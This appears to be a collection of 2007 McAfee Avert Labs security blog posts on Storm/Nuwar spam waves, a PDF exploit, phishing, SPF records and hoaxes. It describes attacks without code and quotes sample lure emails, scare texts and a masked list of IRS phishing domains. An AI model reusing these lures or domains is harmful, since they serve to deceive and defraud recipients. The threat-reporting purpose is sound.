If your sample falls somewhere on the sneakier side of the spectrum, files can really be scattered all over a machine, and some of them are particularly good at hiding. You may want to try scanning your system with the Rootkit Detective or the Beta DATs from the Avert Tools page. This can help identify more suspicious files.

Maybe you’re pretty astute and you’ve noticed that after you ran a file a strange file, it created hundreds of randomly named files in your Windows directory. We may or may not need more than one of those files. You’ll want to check for duplicates, to make sure. If you know how to generate hashes for a file, just make sure you have one of each unique hash, up to about 10. (If you have something parasitic or polymorphic this will give us a decent representation) If you’re not sure how to create a hash, there are certain programs which can help you. One of my favorites is the CRC option in WinZIP (in Configurations, under the Options menu). This allows you to group by CRC and get rid of any duplicates.

In short, try not to just send a blurry video of Sasquatch (or is that a guy in a gorilla suit?) or to send us a hundred disembodied ant legs. The more thorough and complete the sample, the better the chances of getting a complete picture of what’s plaguing your machine.

McAfee Avert Labs today observed e-mail messages with malicious PDF attachments exploiting the critical Adobe Acrobat Mailto Unspecified PDF File Security Vulnerability (CVE-2007-5020) being spammed in the wild. Successful exploitation leads to a batch file being executed on the victim’s machine that disables the built-in windows firewall and then downloads a password stealer from an ip address located on the RBN network.

Malware authors will find this technique of sending exploit-laden PDF files extremely profitable especially in targeted attacks since the Portable Document Format is the de-facto standard for exchanging electronic documents. PDF files have traditionally been unfiltered at the email gateway and until recently were considered risk free in stark contrast to the notorious history associated with Microsoft Office documents.

But with Microsoft making it difficult for attackers by raising the bar for buffer overflow exploits with the release of Windows Vista and Microsoft Office 2007, we expect to see exploit writers target the lower hanging fruit. Abusing exploits in popular applications such as Adobe, Apple, RealPlayer or Antivirus products are proving to be just as advantageous and profitable for the bad guys. McAfee Avert Labs anticipate spammers in collusion with malware authors to continue exploiting popular application flaws and it is imperative that users are educated on how to avoid becoming a victim.

Users running vulnerable versions of Adobe Reader and Acrobat 8.1 or earlier are strongly advised to update them from the Adobe site. McAfee users are pro-actively protected against Exploit-PDF based threats with the latest dat files.

McAfee Avert Labs has observed a new wave of pump-and-dump spam today that we believe to be originating from the Storm worm botnet. The spammed .mp3 attachments promote a company enjoying huge success in Canada and expecting amazing results in the USA.

These audio files are of very poor quality and one has to literally strain one’s ears to hear what’s being announced. The spammed .mp3 files have been encoded using “LAME 3.97“–an open-source mp3 encoder. The filenames are pretty dynamic; here’s a list:

In the last year or so we have seen multiple file types being used in spam runs in an attempt to subvert traditional anti-spam detection techniques. From plain text to ASCII art, image spam, DOC, FDF, PDF, RAR, and XLS–thinking out of the box has given stunning results for these creative spammers.

But this latest spam run isn’t just rank stupid but nonsensical. The audio quality is awful! And since one can’t understand what is being said, how do spammers expect this to actually work? Maybe the next spam run will contain video spam or spam of links to video? Only time will tell…

We’ve got quite a few new variants of JS/Feebs recently. Previous variants tend to have pretty dull examples of social engineering tactics, but today brings a new tactic which is rather perplexing.

Here’s a few examples of subject lines:

• Biohazard in teh USA and other countries!
• Biohazard in the USA and other cuontries!
• Biohazard in the USA and ohter countries!
• The huge meteorite moves to teh Earth!
• The hgue meteorite moves to the Earth!

I figure the odd, roving spelling errors could be explained by one of three possible scenarios: They could be misspelling to try to be “more” convincing (like it’s written by a human), they could be trying to pass spam filters, or it could be they just keep stabbing in the dark at spelling correctly. Sort of an Infinite Monkey theory of social engineering.

The message bodies are where it gets really odd. Here’s the variations for the Biohazard message:

• The fatal virus promptly extends by the planet.
  The virus was killed already nearby by 3000 person in the USA!
  All people are in danger. We dno’t trust in it, btu unfortunately it is teh truth.
  Authorities while are silent to not create a panic. But we already should operate, we should rescue the children!
  Details and instructions in the attached file. You send this message to all whom know!
  Help us the God..
• The fatal virus promptly extends by the planet.
  T
  he virus was killed already nearby by 3000 person in the USA!
  All people aer in danger. We don’t trust in it, but unfortunately it is the truth.
  Authorities while are silent to not create a panic. But we already should operate, we should rescue the children!
  Details and instructions in the attached file. You send this message to all whom know!
  Help us teh God..
• The fatal virus promptly extends by the palnet.
  The virus was killed already nearby by 3000 person in the USA!
  All people are in danger. We don’t trust in it, but unfortunately it is the truth.
  Authorities while are silent to not create a panic. But we already should operate, we sohuld rescue the children!
  Details and instructions in the attached file. You send this message to all whom konw!
  Help us the God..

And now for the discussion of the meteorite:

• The huge meteorite moves to the Earth.
  Scientists have counted up - the trajectory of a meteorite passes precisely through our planet.
  All poeple are in danger. We don’t turst in it, but unfortunately it is the truth.
  Authorities while are silent to not create a panic. Btu we already should operate, we should rescue the children!
  Details and instructions in the attached file. You send this message to all whom know!
  Help us the God..
• The huge meteorite moves to the Earth.
  Scientists have counted up - the trajectory of a meteorite passes precisely through our planet.
  All people are in danger. We don’t trust in it, but unfortunately it is the truth.
  Authorities while aer silent to not create a panic. Btu we already should operate, we should rescue the children!
  Details adn instructions in the attached file. You send this message to all whom know!
  Help us the God..

Whoa. Maybe it loses something in translation.

Suffice it to say, we should all continue getting our news about biohazards and meteorites from sources other than strange, spammy emails.

Comments to my yesterday’s blog prompted me to clarify why the Web site that described a death of a spammer is, in fact, a hoax. The Web site pretends to be a blog and even have a list of previous’ months entries. None of them work though because they do not exist (all point to “sorry.html” and the whole Web site consists of only a single page about the spammer’s murder):

No wonder that all the historical links do not exist - the Web site itself was registered on 11 October 2007 only few hours before the “breaking news” appeared on it.

Plus, neither Russian search sites nor Google have ever heard of this particular spammer (which would be impossible as he is depicted as one of the most prolific). And there is no trace of this murder case in the news, on TV or on the Web. In a word - it is definitely a hoax.

I tend to agree with our colleagues at Sunbelt (http://sunbeltblog.blogspot.com/2007/10/alexey-tolstokozhev-spammer-dead.html) that it could be an attempt to create a highly referenced URL and later it might get populated with exploits and malware.

It seems that today someone invented a new way of fighting spam. The idea is simple—scare spammers to death by circulating a hoax that one of their ilk has just been murdered! It would not take long for people to conclude that such a poor fate might be related to the professional activities of the deceased. The following blog appeared today on one of the anonymous sites and immediately got wide attention:

To reinforce the story they even included a reference to a real story back from 2005 when the most prolific Russian spammer—Vardan Kushnir—was killed in Moscow. There is a big “but” here though. The widespread belief that the murder of Vardan Kushnir in July 2005 was related to spam distribution collapsed after the real killers were detained one month later. It’s ironic, though perhaps typical of how media works, that unfounded speculations received much wider publicity than the facts that became available once the murder case was closed.

As much as we at McAfee Avert Labs would like to reduce the level of spam, we just have to conclude that spammers can still sleep well at night.

Organizations have traditionally blocked outbound Simple Mail Transfer Protocol (SMTP) traffic on port 25 that originates from the local area network (LAN) and virtual private network (VPN) segments. This is done to prevent any internal machine that has been infected with a mass-mailer from spamming the outside world. Email can be traced back to its origin via ip address information contained in the mail header, and no organization wants to be held responsible for spreading malware onto the internet – it would be a public relations nightmare.

By blocking port 25 at the firewall, an organization prevents a mass-mailer from spreading. However, by blindly blocking outgoing SMTP traffic, valuable information on real-time internal infections or data leakage arising from threats that use port 25 is lost.

In this month’s Oct 2007 edition of Virus Bulletin, we proposed the need for an in-house SMTP honeypot. A copy of this article titled “The need for an in-house SMTP Honeypot” can be downloaded from our McAfee Avert Labs Technical White Papers page.

Simple Mail Transfer Protocol honeypots have traditionally been used to masquerade as open-relays in order to frustrate spammers and harvest spam. With changed spammer tactics over the years, it is high time we revisited traditional countermeasures and improved upon them.

They say bad news comes in threes, and it would seem virus writers are the ones getting the bad news right now.

In the last month we’ve seen arrests and a conviction related to two malware families, Downloader-AAP and W32/Fujacks. Now there’s been an arrest and indictment of an alleged botmaster, related to the DDoS attack on CastleCops. Certainly not such smooth sailing for malware authors these days!

On the other hand, it does seem that cybercrime is still pretty lucrative, as long as you don’t mind being incarcerated or monitored by government agencies for a while. The Fujacks author apparently has a very lucrative job waiting for him when he finishes his sentence, and three men who were recently fined by the FTC for surreptitiously distributing adware, will apparently be keeping $3.2 million in profits from their underhanded activities.

While we haven’t won the war against malware authors by a long shot, it certainly seems that a few big battles have been won recently. Hopefully this trend will continue, and being a malware author will become more and more risky and less lucrative.

Phishers today are targeting the IRS with a large phish attack. So far it is spread over 25 domains. The phish offers victims $109.30 refund directly to their credit card for filling in an online form. How convenient

Here is an XYZ-obscured list of domains currently in use.

10361irsfundXYZ.com
13031irsfundXYZ.com
1412irsfundXYZ.com
16268irsfundXYZ.com
17389irsfundXYZ.com
21817irsfundXYZ.com
34042irsfundXYZ.com
37903irsfundXYZ.com
39621irsfundXYZ.com
4331irsfundXYZ.com
49383irsfundXYZ.com
55005irsfundXYZ.com
59631irsfundXYZ.com
61819irsfundXYZ.com
66725irsfundXYZ.com
66731irsfundXYZ.com
7148irsfundXYZ.com
7685irsfundXYZ.com
77452irsfundXYZ.com
79463irsfundXYZ.com
84131irsfundXYZ.com
87655irsfundXYZ.com
91767irsfundXYZ.com
93181irsfundXYZ.com
93189irsfundXYZ.com

Example below:

As is usual these days for this sort of attack the phishers are using a whois privacy service, in this instance register.com’s $9 registration masking service… Again. We’ve seen a number of similar attacks recently. I wonder why they bother paying extra for such things when they are trivially forged.

…There I go again, assuming THEY actually pay.

Oh while we’re on the subject F-Secure have a cute blog on using google to catch paypal phish. Note the “Results: 1-10″ … Ten. Guys, there are 259 other active phish on that server alone. Googlejuice is for wimps

Just last week we blogged about the capture of an international group of phishers responsible for the repeated attacks by the trojan Downloader-AAP.  Thinking that it may be the last we see of the trojan we received some samples of yet another new variant today.

As ususal the trojan seems most prevalent in Germany.  This time the trojan purports to be a billing payment from an European Online Casino organisation.  There is a link inside the message which hosts the Downloader-AAP trojan.  If the user clicks on the link the Downloader will download Spy-Agent.ba

Most interesting about this variant is that there is no attachment to the message received by the user like previous variants but a URL inside it’s message body which points to the Downloader-AAP trojan.  

The following is a sample of the message that has been spammed out.

This is a clear indication that this trojan is still alive and active and that there could be other members of the phishers that have not yet been caught.

Germany’s Federal Criminal Police Office (the BKA) announced today that they busted an internation group of phishers, arresting 10 persons and seizing a number of computers together with other evidence. From the press release it’s evident this is a group that has been harassing the world with phishing emails containing Downloader-AAP as an attachment.

Downloader-AAP is ranked first in the list of ‘Top Corporate User Malware’ in our Avert Labs Threat Library. For many months there have been several waves a week of phishing emails sent with new variants of this downloader, that when executed would install some keylogging trojan. The emails typically look like a receipt sent from some company with details supposedly be found in the attached .zip. Some of these emails even claimed to have come from german law enforcement agencies, stating you’ve been caught sharing music, content from your hard disk has been confiscated using the ‘Bundestrojaner’ and the protocol is attached. Like in the example below:

I sincerely hope this is the last we’ve seen from this group.

Terry Zink has found a spammer that had a valid SPF record and managed to get his advertisement into his field of attention. I don’t buy the “not that it helps” bit since it got as far as his blog and after all anyone sending from this domain would get an SPF PASS when tested and would require further testing of its legitimacy and content.

I’ll get back to my point; This is not an “odd” thing!…

Schalk did a study some time ago on SPF but neglected to point out one important statistic that Terrys post reminded me about. Nearly 9% of the SPF records in his study were +all records. An SPF record of +all means anyone can send email for a domain, and the study covered what we term “domains in focus” (basically domains that we’ve seen used pretty recently and kept an eye on). We’ve kept an eye on this sort of thing for a long time since spammers were the first to adopt SPF for obvious reasons (+all loophole being the main one).

So for anyone that has got this far and doesn’t see the point yet… +all SPF records mean “I don’t care”

I firmly believe that not enough domain owners publish SPF records, so here is a quick guide to SPF for the-little-guy (All you big companies already have them right?).

Situation 1 - Your domain is hosted on a cpanel account (other $5/month hosting products are available) or your a single server company handling your own inbound mail :

"v=spf1 mx -all"

This SPF record says: Only my mail server can send mail for my domain.

Situation 2 - Mail is routed out (smarthosted) by your ISP:

"v=spf1 mx a:smtp.example.com -all"

This SPF record says: Only my mail server and the host smtp.example.com can send mail for my domain.
or

"v=spf1 mx ip4:172.16.25.25 -all"

This SPF record says: Only my mail server and the host with the IP address 172.16.25.25 can send mail for my domain.
or

"v=spf1 mx redirect:example.com -all"

This SPF record says: Only my mail server and any SPF host for example.com can send mail for my domain.

So there you go. That’s how you can help protect your domain from being forged by spammers. All we need to do now is have the rest of the world check them. Shoot anyone with a +all record type and convince any online auction and payment processing sites to make theirs less broken, so it actually works too (RFC 4408,10.1/6) .

W32/Nuwar aka the Storm worm ever since it debut in Nov 2006 has relentlessly flooded internet users with its ever-changing email campaigns. With the storm worm authors having this uncanny knack of using sensationalist themes that draw public attention, the morbid curiosity it has generated has ensured that is the most blogged about piece of malware this year!

The latest campaign is an HTML formatted email using the Labor Day theme, inviting users to view an online greeting card. A copy of the spammed email is as follows:

The authors have used anchor tags in HTML to mask the greeting card link so that an unsuspecting user does not notice that it actually points to a malicious ip address. Hovering the mouse over this disguised link is a quick and dirty way to reveal the real destination address. Users who fall for this bait are directed to the following Happy Labor Day page.

Everything looks hunky-dory except an unsuspecting user is served an xor’ed exploit cocktail in the background. In addition to the usual Microsoft exploits, QuickTime and WinZip buffer overflow exploits are also attempted on a user’s machine. Given the slim likelihood of vulnerable third party applications being up to date on a user’s machine, it increases the attacker’s chances of a successful exploitation. Especially since most applications do not support automated updates and it is left up to the users to first find out if they have a vulnerable version of the application and then manually patch it.

Enterprise customers have the bandwidth and resources to ensure every machine on the corporate network is fully patched. It is usually home consumers - the low hanging fruit that fall prey to these malicious tactics. For users wanting to check if third party applications on their systems are vulnerable, a free online resource to visit would be the Secunia Software Inspector. Happy Patching

While monitoring the Nuwar/Zhelatin/Storm network, I noticed the bot stoped sending out emails on Thursday at 9.45pm UTC.

No more postcards? No more Pump&Dump spam? Or just a bug in my setup?

This morning at 7.00am UTC, still not a single mail. But I saw the bot connecting to the Peer-to-Peer network and transfering data - the same way it used to do the last several days.

I gave MessageLabs a call and they confirmed that the number of intercepted emails containing Nuwar related links had diminished considerably in the past few hours.

So it’s not my goat setup behaving different as expected.

Time to party? Unfortunately not - at 10.45am UTC, my system sent me an alert. New mails got captured. Well, at least it took a nap for 13 hours.

Watch out for mails offering videos from either:

Snoop Dog, Beyonce, Hurricane Chris, Emenem, Lil Mama, Heuy, Chris Brown, Eagles, T-Pain, Fergie, R. Kelly, Sean Kingston, Kelly Clarkson, Velvet Revolver, Fat Boy, Akon, Rihanna, Foo Fighters.

For example:

Š

The Nuwar gang are up to no good again. So far we’ve seen a dizzying flurry of malicious ecards, sexy emails, membership themes and YouTube bait over the last couple of weeks from the authors of the Storm worm. The latest spam run calls for beta testers to try out a product in exchange for life time free updates. A sample mail is as follows:

What the unsuspecting user gets in return upon downloading and executing “setup.exe” is more than what they had hoped for! - A copy of the W32/Nuwar worm.

The newest spam run uses plain text instead of HTML formatted emails and the ip addresses listed appear to be re-used across different spam runs. If one were to traverse to the root of the listed url: http://75.70.[Removed].232 we end up with a page showing a YouTube image (Nuwar’s spam theme over the weekend) requesting the user to manually download and execute “video.exe”. More alarmingly, doing a Google search for any of the subjects lines used in the Nuwar YouTube spam run is throwing up legitimate blog sites that appear to be infected with links pointing to a copy of the worm. More on this at SunBelt’s blog.

Sadly the authors of Nuwar can afford to experiment at will, because if an experiment were to fail, the worst that can happen is that one of their spam runs would not be that successful. And these spammers get instant feedback on how successful a spam run was because people continue to click on the bait links. As a result of this user feedback they continue to develop more effective social engineering techniques and improve upon their creations.

If your computer is fully patched, is running an up to date antivirus and firewall solution, it still does not stand a chance against social engineering when a user invites the threat in. Especially since malware can be tweaked and tested until they stay undetected by an antivirus product. McAfee Avert Labs expects the spammers to continue using these types of tactics and it will be imperative that users are educated on how to avoid becoming a victim.

McAfee Avert Labs has observed a new trend in W32/Nuwar spamming over the weekend. The authors of this malware have resorted to spamming HTML formatted emails that pretend to be from a friend sending a link to a video from YouTube. A copy of the spammed email is as follows:

To the average computer user, the link in the email would seem perfectly legitimate as it points to youtube.com but if one were to hover the mouse over the URL, it would point to a numeric ip address. This is achieved by using special HTML anchor tags in order to obfuscate the malicious URL so that what the victim sees is usually not what they get. As if forecasting the Nuwar author’s next move, McAfee Avert Labs had recently blogged about the risks of using HTML formatted email.

For users who fall for this bait and click the link, they are directed to a site containing an image, tagging back to YouTube’s logo.

In the background an embedded obfuscated JavaScript routine that attempts a cocktail of browser and application exploits is executed. If successful, the user’s machine gets infected with a copy of W32/Nuwar. If the exploits fails to run on a fully patched machine, the malware author has used clever wordings on the webpage in order to entice users to manually download and launch the virus via good old social engineering.

With so much thought and creativity going into keeping the W32/Nuwar juggernaut rolling, it will be interesting to see how the field plays out. Remember for every counter measure, there is a counter-counter measure. We only lose if we stand still. And what would be the fun in that?

Today Nuwar/Zhelatin spammed out several thousand mails, which are very similar to those we saw yesterday. Although the spam template did not change at all, the format of the mail changed:

It changed to HTML instead of plain text, but it does not contain any active content such as JavaScript or ActiveX.

Compared with the last spam wave, the IP address is no longer visible. Users might have learned not to click on http://xx.xx.xx.xx/ IP addresses in spam mails, and now they need to get educated again.

The bots are communicating with each other using a peer-to-peer network. The parameters for DDoS attacks and also the spam templates get pushed to the bots over the network. So it’s not hard-coded and therefore it’s hard to write a generic signature in an antivirus product for the next wave. Using an antispam product to detect and block those mails is the appropriate approach.

The latest round of the Nuwar/Zhelatin virus gave up the social-engineering technique of fake postcards. Now they are sending you a fake welcome letter to “Fun World” with your username and password!

This one is not using a target approach, like mixing the e-mail with the fake username, but it may only be a question of time before we start to see it.

Here’s an example of such an approach:

——————————————-
Greetings,

Here is your membership info for Fun World.

Membership Number: 4659948744
Login ID: user6614
Temp Password ID: gr952

Please change your login and change your login information.

This link will allow you to securely change your login info: http://xx.xx.xx.xx

Welcome,
Support Department
Fun World
—————————————————————————

Fun world? Nah, don’t bet on it.

Hot off the presses - here’s a copy of a new Nuwar email I just got in my inbox:

Welcome Member,

We are glad you joined Downloader Heaven.

User Number: 3692766664
Your Temp. Login ID: user3709
Your Password ID: oh662

Please keep your account secure by logging in and changing your login info.

Click here to enter our secure server: http://555.112.63.49/

Welcome,
Membership Support Department
Downloader Heaven

Now, you’ll note this isn’t a valid IP address.  It seems they’ve officially given up on the e-card thing, and are playing around to see what sort of techniques work better.  I’d guess the “sexy” emails didn’t work so well, as many corporate email filters would have tagged messages with that sort of content.

Apparently, ecard scam doesn’t work that well any more for Nuwar. Or maybe the virus author read Allysa’s post and decided to abandon the ecard plot before it’s too late. Anyway, now Nuwar spam resorted to the eternal sex theme, the favourite among spammers. The latest Nuwar E-mails have an empty Subject: and the contents is like this:

Lonely? Me too. Look what I like to do when I get lonely.
http://555.37.138.40/

or

I never thought I would ever take these kind of pics, but it makes me so wet. take a look, hehe.
http://555.30.9.127/

or… Well, you get the idea. Basic instinct galore!

P.S. I shamelessly copycatted Hollywood - there are no IP addresses beginning with, or indeed containing, 555.

Hoax virus warning messages are more than mere annoyances. After repeatedly becoming alarmed, only to learn that there was no real virus, computer users may get into the habit of ignoring all virus warning messages, leaving them especially vulnerable to the next real, and truly destructive, virus. 

For years, I’ve been telling people how to recognize new or new variations of hoax e-mails.  There are generally 5 things to look out for:

• Hoaxes often mention a big industry company as the source for the information (e.g., Microsoft, AOL).
• Hoaxes often say, in some wording or other, that the threat in question is the most powerful ever.
• Hoax messages are often short and always give us the impression of fear.
• Hoax creators ALWAYS ask their victims to spread the message to the maximum number of people possible.
• Hoaxes often indicate that the threat was released at an indeterminate time (yesterday, for example, rather than specifying a date).

But what happens when the “hoax” information is (somewhat) true?

I came across an e-mail from a customer yesterday, that at first glance, looked like the usual hoax e-mai